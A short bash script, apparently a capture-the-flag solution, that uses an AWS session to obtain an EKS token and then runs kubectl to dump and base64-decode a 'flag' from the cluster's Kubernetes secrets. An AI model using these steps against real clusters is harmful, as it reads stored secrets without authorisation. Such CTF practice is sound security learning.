#!/bin/bash

# We already have a session from aws sts get-caller-identity
# Creating a token via eks and the role
export EKS_TOKEN=$(aws eks get-token --cluster-name=eks-challenge-cluster | jq -r '.status.token')

# Hack to get the flag from the image layer
kubectl --token=$EKS_TOKEN get secrets -o json | jq -r '.items[0].data.flag' | base64 -d